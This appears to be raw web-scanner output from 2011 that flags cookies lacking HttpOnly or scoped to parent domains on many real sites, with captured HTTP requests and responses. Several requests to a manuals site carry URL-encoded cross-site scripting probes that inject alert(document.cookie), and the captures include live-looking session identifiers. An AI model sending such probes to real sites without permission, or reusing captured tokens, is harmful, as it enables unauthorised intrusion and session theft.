s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26A6AAA485161A8B-40000177E007F5AC|4D4EA057[CE]; Expires=Fri, 5 Feb 2016 13:21:31 GMT; Domain=.2o7.net; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
s_vi_kxxwwupgxxbspbtx7Dxxx7Ft=[CS]v4|26A7502C850132CA-6000010CE0000D64|4D4EA057[CE]; Expires=Fri, 5 Feb 2016 13:21:39 GMT; Domain=.2o7.net; Path=/
s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26A6AAA485161A8B-40000177E007F5AC|4D4EA057[CE]; Expires=Fri, 5 Feb 2016 13:21:39 GMT; Domain=.2o7.net; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
s_vi_kxxwwupgxxbspbtx7Dxxx7Ft=[CS]v4|26A7502C850132CA-6000010CE0000D64|4D4EA057[CE]; Expires=Fri, 5 Feb 2016 13:22:21 GMT; Domain=.2o7.net; Path=/
s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26A6AAA485161A8B-40000177E007F5AC|4D4EA057[CE]; Expires=Fri, 5 Feb 2016 13:22:21 GMT; Domain=.2o7.net; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=abcVlqF-RDKD_8Ubzi33s; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /log.jsp?siteid=12&rand=36384 HTTP/1.1 Host: 66.29.38.208 Proxy-Connection: keep-alive Referer: http://www.freedownloadscenter.com/terms/html-tracert-nslookup/nslookup.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cr/ HTTP/1.1 Host: about.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Length: 37517 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Expires: Sat, 05 Feb 2011 21:50:51 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 21:50:51 GMT Connection: close Set-Cookie: ASPSESSIONIDASDBDTQR=LDHHNHDCIPFCPCJINCAFLEBD; path=/ Set-Cookie: BIGipServerAXAboutUs_Public=3725306048.20480.0000; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml2/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ads/impression.js HTTP/1.1 Host: ads.adxpose.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=7E69101147A34B6B00D14757D8B00E8B; Path=/ ETag: "0" Cache-Control: must-revalidate, max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/javascript;charset=UTF-8 Content-Length: 9 Date: Sat, 05 Feb 2011 22:42:44 GMT Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/join HTTP/1.1 Host: appdeveloper.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 05 Feb 2011 21:50:29 GMT Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Set-Cookie: SESS5a5e2306769d28180c45e44dbead8572=be7a4e884222cc6fa4ab1f17533bad8a; expires=Tue, 01-Mar-2011 01:23:49 GMT; path=/ Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 05 Feb 2011 21:50:29 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Set-Cookie: loginpt=0 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /consumertravel/travel.do HTTP/1.1 Host: axptravel.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: baselinemag.us.intellitxt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wcAAAEt+yNLhQA-; VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--";
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=E7B165A3FC1D5B0A74756CBDC197A8CE; Path=/ Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Content-Type: text/html Content-Length: 176 Date: Sun, 06 Feb 2011 16:00:34 GMT Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: blog.vibrantmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 36022 Content-Type: text/html Server: Microsoft-IIS/7.5 Set-Cookie: ASPSESSIONIDQADSARBD=CEDGFMCCFKAPMLCDHAIIHEPD; path=/ p3p: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" X-Powered-By: ASP.NET Date: Sat, 05 Feb 2011 22:45:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Vibrant - The Leaders of Contex ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=kt1uph07r6rvoff2tchko0efd3; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rmb-account/login-page HTTP/1.1 Host: channelmarketing.owneriq.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:46:51 GMT Server: Apache/2.2.14 (Fedora) X-Powered-By: PHP/5.2.9 Set-Cookie: PHPSESSID=kt1uph07r6rvoff2tchko0efd3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 14989
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <META http-equiv="C ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
sessionId=nullCookie; Path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cib/CEBMainServlet/Login?FIORG=330&FIFID=124085066 HTTP/1.1 Host: cibng.ibanking-services.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:24:55 GMT Server: IBM_HTTP_Server Pragma: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-Cache Set-Cookie: wf=wf Set-Cookie: sessionId=nullCookie; Path=/ Connection: close Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 9003
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <title>Personal Savings from American Express : Welcome to Personal Savings from American ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /gcs/cards/ HTTP/1.1 Host: corp.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 21:50:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-cookie: SaneID=173.193.214.243-25629229680629; path=/; expires=Sat, 05-Feb-16 21:50:31 GMT; domain=.americanexpress.com X-AspNet-Version: 1.1.4322 Set-Cookie: ASP.NET_SessionId=mzrsjm55ziqng1au1tmzi545; path=/ Cache-Control: public, max-age=90 Expires: Sat, 05 Feb 2011 21:52:01 GMT Last-Modified: Sat, 05 Feb 2011 21:50:31 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 39860
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <head>
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /gcs/cards/land/compare.aspx HTTP/1.1 Host: corp.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 21:50:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-cookie: SaneID=173.193.214.243--17320946710097; path=/; expires=Sat, 05-Feb-16 21:50:33 GMT; domain=.americanexpress.com X-AspNet-Version: 1.1.4322 Set-Cookie: ASP.NET_SessionId=q0nfjsmlal0n1l45z4jzte55; path=/ Cache-Control: public, max-age=900 Expires: Sat, 05 Feb 2011 22:05:33 GMT Last-Modified: Sat, 05 Feb 2011 21:50:33 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 40724
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <head>
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: dailyme.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:47:24 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.3.5 Set-Cookie: DMSession=mta7v9iqenkhb3clgekkekl847; expires=Wed, 06-Feb-2036 04:47:24 GMT; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CakeCookie[DMWelcome]=1296946044; expires=Mon, 07-Mar-2011 22:47:24 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43921
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http: ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: download32.us.intellitxt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt98uhdQA-; VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY";
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=ED259F275B4DF68A893132CB65AC345C; Path=/ Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Content-Type: text/html Content-Length: 176 Date: Sat, 05 Feb 2011 21:51:04 GMT Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=a6o1kn0utu76227b6d1n8dnmd0; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /e_cal.php?duration=daily&top_text_color=FFFFFF&top_bg=4E505C&header_text_color=ffffff&header_bg=838893&bg1=FFFFFF&bg2=ECECEC&border=CEDBEB HTTP/1.1 Host: ecal.forexpros.com Proxy-Connection: keep-alive Referer: http://dws1.etoro.com/ApplicationServices/Calendar/?rows=13&cid=1&pid=1&URL=http%3A//www.etoro.com/B1025_A19968_TClick.aspx Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=gjvvrs2l67ha5pldm6dmbvpve3; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: etfdb.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:04:04 GMT Server: Apache X-Powered-By: W3 Total Cache/0.9.1.3 Set-Cookie: PHPSESSID=gjvvrs2l67ha5pldm6dmbvpve3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-UA-Compatible: IE=EmulateIE7 X-Pingback: http://etfdb.com/xmlrpc.php Vary: User-Agent,Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 35439
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /event.flow?eventcode=000_000_11&location=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&uid=W25t6coj820hSGmI&xy=251%2C232&wh=985%2C1012&duration=21132982%7C21132982&iframed=0 HTTP/1.1 Host: event.adxpose.com Proxy-Connection: keep-alive Referer: http://htcwiki.wetpaint.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2; JSESSIONID=43E251877DDE1938FDE4FA32451B41F5
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=6E5592FB2762E8F73BC4BF6D783C51C0; Path=/ Cache-Control: no-store Content-Type: text/javascript;charset=UTF-8 Content-Length: 0 Date: Sat, 05 Feb 2011 21:51:28 GMT Connection: close
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: funp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /106253 HTTP/1.1 Host: getclicky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:51:05 GMT Server: Apache P3P: CP='NOI DSP COR CUR OUR NID NOR' Set-Cookie: PHPSESSID=599ee4e27da0b537e792a372d516bdda; path=/ Cache-Control: must-revalidate, no-cache Set-Cookie: referer=80899; expires=Wed, 06 Apr 2011 21:51:05 GMT; path=/; domain=.getclicky.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 45095
<!doctype html> <html> <head> <title>Web Analytics in Real Time | Clicky</title> <meta name="description" content="Clicky Web Analytics is simply the best way to monitor, analyze, and react to your bl ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=0e18f424g79t43jjqhrcjrriq4; expires=Fri, 02 Dec 2011 22:49:24 GMT; path=/; domain=.hellotxt.com
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: hellotxt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/ ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en_US/hh/home_index.do HTTP/1.1 Host: hhonors1.hilton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ex/mfg/headline/m/ariens/d/type/product_problem HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=58; __utmz=162857765.1296942825.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; adsust=n2; adsus=2jh81Z; PAPVisitorId=c21ce48b6f65fadb04f522bba10uSpNn; __utma=162857765.1785005893.1296942825.1296942825.1296942825.1; __utmc=162857765; __utmb=162857765.2.10.1296942825;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ex/mfg/headline/m/ariens/d/type1a19b%252527%25253balert%2525281%252529%25252f%25252f35f276845e/product_problem&hl=en&client=ca-pub-4582869284305424&adU=www.Rackspace.com/Exchange_Hosting&adT=ImageAd&gl=US&usg=AFQjCNFHyAxyRcv5LqEhS2qHXwW0t83rLQ/ HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=58; __utmz=162857765.1296942825.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; adsust=n2; adsus=2jh81Z; PAPVisitorId=c21ce48b6f65fadb04f522bba10uSpNn; __utma=162857765.1785005893.1296942825.1296942825.1296942825.1; __utmc=162857765; __utmb=162857765.2.10.1296942825;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ex/mfg/headline/m/ariens/d/type1a19b%27%3balert%281%29%2f%2f35f276845e/product_problem/ HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=58; __utmz=162857765.1296942825.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; adsust=n2; adsus=2jh81Z; PAPVisitorId=c21ce48b6f65fadb04f522bba10uSpNn; __utma=162857765.1785005893.1296942825.1296942825.1296942825.1; __utmc=162857765; __utmb=162857765.2.10.1296942825;
Response
HTTP/1.0 404 Not Found Date: Sat, 05 Feb 2011 22:49:29 GMT Server: Apache/2.2.14 (Fedora) X-Powered-By: PHP/5.2.9 Set-Cookie: memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; expires=Mon, 07-Mar-2011 22:49:29 GMT; path=/; domain=.manualsonline.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&hl=en&client=ca-pub-4582869284305424&adU=www.Rackspace.com/Exchange_Hosting&adT=ImageAd&gl=US&usg=AFQjCNFt7K-JBKpz6-rzEu72zZg5MwT1cg/ HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=26; __utmz=162857765.1296956996.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; memSessionId=5378e2dc-3193-11e0-bdbb-0030485f67c6; adsust=n1; adsus=26b9sk; PAPVisitorId=c21ce48b6f65fadb04f522bba10uSpNn; __utma=162857765.1785005893.1296942825.1296942825.1296956996.2; __utmc=162857765; __utmb=162857765.1.10.1296956996;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ex/mfg/headline/m/ariens47888%27%3balert%28document.cookie%29%2f%2f8fcf167d281/d/type/product_problem/ HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=58; __utmz=162857765.1296942825.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; adsust=n2; adsus=2jh81Z; PAPVisitorId=c21ce48b6f65fadb04f522bba10uSpNn; __utma=162857765.1785005893.1296942825.1296942825.1296942825.1; __utmc=162857765; __utmb=162857765.2.10.1296942825;
Response
HTTP/1.0 404 Not Found Date: Sat, 05 Feb 2011 22:49:36 GMT Server: Apache/2.2.14 (Fedora) X-Powered-By: PHP/5.2.9 Set-Cookie: memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; expires=Mon, 07-Mar-2011 22:49:36 GMT; path=/; domain=.manualsonline.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /managemystuff.html HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=58; __utmz=162857765.1296942825.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; adsust=n2; adsus=2jh81Z; PAPVisitorId=c21ce48b6f65fadb04f522bba10uSpNn; __utma=162857765.1785005893.1296942825.1296942825.1296942825.1; __utmc=162857765; __utmb=162857765.2.10.1296942825;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
<p>Access thousands of manuals, user community, personal homepage, original blog content and newsletters!</p> <form onsubmit="javascript: submitRegistration('Popup'); return false;" id="sRegFormIdPopu ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: identi.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:50:12 GMT Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.6-3ubuntu4.6 Set-Cookie: PHPSESSID=e388a003ef12638804228edaa3f744b8; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,Cookie Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 43202
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: imera.com.br Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:54:46 GMT Server: Apache/2.2.6 (Fedora) Set-Cookie: JSESSIONID=3F0AAFD21BC620CD5628A56E4B94EB70; Path=/ Cache-Control: no-store, max-age=0, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Length: 41531
